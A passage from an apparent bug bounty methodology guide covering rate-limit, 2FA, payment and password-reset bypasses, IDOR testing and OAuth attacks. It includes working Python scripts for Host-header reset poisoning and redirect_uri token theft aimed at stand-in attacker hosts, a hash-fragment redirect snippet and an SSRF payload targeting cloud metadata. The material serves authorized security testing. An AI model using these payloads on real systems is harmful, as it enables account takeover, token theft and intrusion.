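        spoofed_ip = f"10.0.0.{i + 1}"  # a fresh "source" address per attempt
        r = requests.post(URL, json=body, headers={header: spoofed_ip}, timeout=10)
        if r.status_code == 429:
            print(f"{header}: still throttled after {i + 1} attempts")
            break
    else:
        print(f"{header}: 30 attempts without a 429 -- possible bypass")
```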
- Bypass 2FA/MFA - Two-Factor Authentication (2FA) and Multi-Factor Authentication (MFA) require a user to take an additional step before logging in or executing a critical mechanism (password change, for example). As a bug bounty researcher, your goal is to execute that mechanism without taking the additional step. There are countless ways to implement 2FA/MFA in an application, so it's really difficult to standardize how to test this bypass. The more you understand about the target app's extra verification step, the greater chance you will have of finding a way to bypass it. Try dropping requests in the authentication flow, sending unexpected input as part of the validation, etc. You want this mechanism to fail open.
- Bypass Payment Process Restrictions - Once again, there are countless ways to build a mechanism that allows the user to pay the owners of a web application for goods or services. If an attacker is able to bend the logic of that mechanism in a way that affects the final price, or whether a card is actually charged, the company could lose a huge amount of revenue. Your goal as the bug bounty hunter is to send as many different types of unexpected input as possible, in as many different sequences as possible. Try to find patterns the developers would never think of. Can you change the quantity of an item to a negative number, giving a discount on the overall order? Can you drop the HTTP request going to their banking integration that actually charges your card but send the rest of the HTTP requests, causing the application to believe the charge was successful? These are just a few examples; find as many disclosed bug bounty reports as you can on payment logic. This will help you get ideas while you are testing.
- Bypass Registration Restrictions - Some applications prevent users from registering for an account unless they meet certain criteria. Bypassing those restrictions to obtain a valid user account could have a huge impact, depending on the application. More importantly, if you can register an account that has the same unique identifier (username, email, etc.) as an existing account, you could possibly exfiltrate sensitive data or take over the victim's account entirely. All applications will have some form of restrictions on registration. Your goal, once again, is to cause these restrictions to fail open by acting in a way that the developers did not intend.
- Bypass Password Reset Restrictions - Unlike the previous tests that could have countless different controls throughout the larger mechanism, password reset restrictions are fairly straightforward. Either the user is only allowed to reset their own password, or there is also an Admin user that can reset their password for them. Either way, your goal as a bug bounty hunter is to gain control of this mechanism and reset another user's password without permission. There are several ways you could go about that. If the password reset mechanism sends an email to the user with a password reset URL, try modifying the Host Header or fuzzing for hidden headers that might allow you to overwrite the domain of the URL sent to the user (see the sketch below). If so, you can change the domain to a server you control and intercept the password reset token in the URL. If the password reset requires you to know the answer to security questions, try sending unexpected strings or types that will cause it to fail open. If there is an Admin role/user that can reset the password, try to gain unauthorized access to that mechanism or find a client-side injection to force a real Admin to change it.
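For the reset-link poisoning idea above, the core test is simply resending the "forgot password" request with an overridden Host (or X-Forwarded-Host) header and checking which domain lands in the email. A sketch with placeholder endpoint and header values; always point the reset at an inbox you own:

```python
import requests

URL = "https://target.example.com/user/password/reset"  # hypothetical reset endpoint
body = {"email": "attacker-controlled@example.com"}     # an inbox you own

# Different ways the framework might derive the domain used in the reset link
header_sets = [
    {"Host": "evil.example.net"},
    {"X-Forwarded-Host": "evil.example.net"},
    {"Host": "target.example.com", "X-Forwarded-Host": "evil.example.net"},
]

for headers in header_sets:
    r = requests.post(URL, json=body, headers=headers, timeout=10)
    print(headers, "->", r.status_code)
    # Then check the email that arrives: if the reset URL points at evil.example.net,
    # a victim's reset token could be captured the same way
```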
SUMMARY: Insecure Direct Object References (IDORs) occur when an application fails to validate that a client is authorized to access the data contained in a specific object. Every mechanism in a web application performs a CRUD operation on data stored in the application's database. To accomplish this, the application must find some way to identify the object that is being read/modified/deleted (IDORs don't typically come into play on CREATE mechanisms). A method in the server-side code is designed to take a unique identifier and query the database for the data set represented by that unique identifier. How this works exactly depends on the technology stack, but from a security standpoint they all do the same thing. The vulnerability occurs when the application fails to validate that the user submitting the unique identifier is authorized to access the larger data set.
YouTube Video - [Part I] Bug Bounty Hunting for IDORs and Access Control Violations
- Identify a mechanism that performs a READ, UPDATE, or DELETE operation.
- Determine how the data being modified is being identified in the database.
- From the Session Token? - This only happens when the data being modified is directly linked to the user's identity, but it can be very hard to get an IDOR with this pattern.
- From an ID Value Signed for Integrity? - If the ID value is in a JSON Web Token (JWT) or similar signed data store, then you need to break the signature validation before you can control the ID value and test for IDORs.
- From a user-controlled parameter? - Jackpot, this is the best case scenario for IDORs.
- Find and document the unique identifier of another object of the same type you should not have access to.
- Attempt to access the other object to test whether the application is verifying your authorization to access that data.
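The last two steps boil down to requesting an object you own and an object you don't with the same session, then comparing the responses. A minimal sketch (the path, cookie name, and IDs are placeholders taken from the two test accounts you registered):

```python
import requests

BASE = "https://target.example.com"
attacker_session = {"session": "ATTACKER_SESSION_TOKEN"}  # placeholder cookie name/value

my_object_id = 1001       # object owned by your attacker account
victim_object_id = 1002   # object owned by your second (victim) test account

for obj_id in (my_object_id, victim_object_id):
    # Hypothetical READ mechanism for a Message Object
    r = requests.get(f"{BASE}/api/message/{obj_id}", cookies=attacker_session, timeout=10)
    print(obj_id, "->", r.status_code, r.text[:120])

# If the victim's object comes back with a 200 and its data, the mechanism is not
# validating that the client is authorized to access that identifier -- an IDOR.
```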
YouTube Video - Ask Yourself These Four Questions When Bug Bounty Hunting for IDORs
To identify mechanisms that are good targets for IDORs, ask yourself these four questions for every mechanism:
- Does the endpoint return a unique response based on the client's identity?
- Does the endpoint identify the client by establishing a User Context via a Session Token?
- Does the endpoint identify the client through an ID value with a signature (JWT, etc.)
- Does the endpoint simply pull an ID value from a parameter?
SUMMARY: OAuth testing is one of my favorite ways to test for several reasons. First, OAuth is fairly complex and there are hundreds of different ways to implement the protocol/framework (I've heard it called both). Second, as I've mentioned before, OAuth was never designed to be used for Authentication, so if you find an application using OAuth for authentication you've already found a major design flaw. And don't even get me started on using JSON Web Tokens (JWTs) for Session Tokens. Anyway, I digress... OAuth can be implemented in many different patterns with optional variables based on the functionality the developers are looking for. The fact that OAuth is so adaptable is great for flexibility, but it also can make implementing OAuth very complex. As always, this complexity is where the vulnerabilities will live. Also keep in mind that developers are just trying to complete the work they've been assigned on a ticket. They are rarely considering how the OAuth patterns and configurations they choose affect the security of the mechanism. If you understand how the many OAuth patterns work, you can easily identify which patterns have been used in an application. From there, check for known dangerous patterns like not including a state token or not validating the redirect_uri. Masters of OAuth testing can recognize how the pattern and configuration have a downstream effect on the other mechanisms throughout the application. For example, an OAuth integration that does not limit the scope of access for a client to a GDrive instance may allow a legitimate user to access data within the GDrive that they should not have access to, simply because the OAuth scopes are misconfigured. Don't just stop at checking for known issues with OAuth implementations. Really learn how the protocol works and, over time, you will begin to see major security holes that can pay off big!
- Authorization Request
- Common parameters: redirect_uri/response_type/scope/state
GET /authorization?client_id=12345&redirect_uri=https://client-app.com/callback&response_type=code&scope=openid%20profile&state=ae13d489bd00e3c24 HTTP/1.1
Host: oauth-authorization-server.com
- User Consent
- Authorization Code Grant
- Common parameters: code/state
- Vulnerable to CSRF
GET /callback?code=a1b2c3d4e5f6g7h8&state=ae13d489bd00e3c24 HTTP/1.1
Host: client-app.com
- Access Token Request
- Common parameters: client_secret/grant_type/client_id/redirect_uri/code
POST /token HTTP/1.1
Host: oauth-authorization-server.com
…
client_id=12345&client_secret=SECRET&redirect_uri=https://client-app.com/callback&grant_type=authorization_code&code=a1b2c3d4e5f6g7h8
- Access token grant
- Server responds with Bearer Token
- API call
- Contains Authorization header w/ Bearer Token
- Resource grant
- Server responds with sensitive data
- Step 1: Search traffic for known OAuth parameters
client_id
redirect_uri
response_type
state
- Step 2: Send GET request to known OAuth Service Provider endpoints
/.well-known/oauth-authorization-server
/.well-known/openid-configuration
- Step 3: Identify Grant Type (response_type parameter)
- Authorization Code -- response_type=code
- Implicit -- response_type=token (More common in SPAs and Desktop Apps)
- Step 4: Identify misconfigurations that can be abused
- Implicit -- All data in POST request not validated when establishing session
- Authorization Code -- No state parameter used -> CSRF (most impact when linking accounts)
- Authorization Code / Implicit -- Steal code/token through redirect_uri
- There are several redirect possibilities:
- Redirect to any domain
- Redirect to any subdomain
- Redirect to specific domains
- Redirect to one domain, all paths
- Redirect to one domain, specific paths
- Redirect to one domain, one path
- Redirect to whitelisted domains and/or paths based on Regex
- 8a. Can add parameters
- 8b. Can add specific parameters
- 8c. Cannot add parameters
- Note: Try using parameter pollution, SSRF/CORS defense bypass techniques, localhost.evil-server.net, etc.
- Step 1: Send malicious url with poisoned redirect_uri parameter
- Step 2: Read code/token in response
- Step 3: Substitute stolen code/token when logging in
- Note: If redirect_uri parameter is sent with code/token, server is likely not vulnerable
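As a concrete illustration of Step 1, the malicious link is just the normal authorization URL with redirect_uri swapped for (or smuggled toward) a server you control. A sketch that builds a few candidate URLs using the parameter names from the flow above (the client_id, domains, and paths are placeholders):

```python
from urllib.parse import urlencode

AUTH_SERVER = "https://oauth-authorization-server.com/authorization"
CLIENT_ID = "12345"
LEGIT_REDIRECT = "https://client-app.com/callback"
ATTACKER = "https://evil-server.net/capture"

candidate_redirects = [
    ATTACKER,                                   # no validation at all
    LEGIT_REDIRECT + "/../../capture",          # path traversal past a prefix check
    f"{LEGIT_REDIRECT}?next={ATTACKER}",        # open redirect chained off the real callback
    "https://client-app.com.evil-server.net/",  # sloppy domain matching
]

for redirect in candidate_redirects:
    query = urlencode({
        "client_id": CLIENT_ID,
        "redirect_uri": redirect,
        "response_type": "code",
        "scope": "openid profile",
        "state": "ae13d489bd00e3c24",
    })
    # Deliver the link to a logged-in test account and watch your server logs
    # for the code/token arriving in the redirect
    print(f"{AUTH_SERVER}?{query}")
```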
- Steal parameter data from hash fragments:
<script>
if (document.location.hash){
console.log("Hash identified -- redirecting...");
window.location = '/?'+document.location.hash.substr(1);
} else {
console.log("No hash identified in URL");
}
</script>
- Upgrade scope to access protected resources (depends on grant type):
- Authorization Code:
- Step 1: Register a malicious application with the OAuth server
- Step 2: Victim approves limited scope
- Step 3: Malicious application sends POST request to /token with expanded scope
- Result: If the OAuth server does not validate the scope with the original request, the access token returned will have an expanded authorization
- Implicit:
- Step 1: Steal access token
- Step 2: Manually send access token with expanded scope
- Result: If the OAuth server does not validate the scope with the original request, the access token returned will have an expanded authorization
- Sign up with victim's email to get account takeover
- Uses JWT (id_token)
- Keys can be exposed on /.well-known/jwks.json
- Configuration can be exposed on /.well-known/openid-configuration
- Can be combined with normal OAuth grant types EX: response_type=id_token token || response_type=id_token code
- Step 1: Check for dynamic registration (is some form of authentication required, like a Bearer token?)
- Step 2: Craft a malicious registration payload for SSRF (see the sketch below)
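For Step 2, one common approach is to register a client whose URL-valued metadata, such as logo_uri, points at an internal address, then trigger the server to fetch it. A sketch assuming an unauthenticated registration endpoint advertised as registration_endpoint in the openid-configuration response (the /register path, the payload fields beyond the spec basics, and the internal target are assumptions to verify against your target):

```python
import requests

# Usually discovered via the "registration_endpoint" key in /.well-known/openid-configuration
REGISTRATION_ENDPOINT = "https://oauth-authorization-server.com/register"

payload = {
    "client_name": "rs0n-test-client",
    "redirect_uris": ["https://client-app.com/callback"],
    # URL-valued metadata the server may fetch on its own -- a potential SSRF sink
    "logo_uri": "http://169.254.169.254/latest/meta-data/",
}

r = requests.post(REGISTRATION_ENDPOINT, json=payload, timeout=10)
print(r.status_code, r.text)

# If registration succeeds, requesting the new client's logo (often served by an
# endpoint that looks it up by client_id) may return the internal response instead.
```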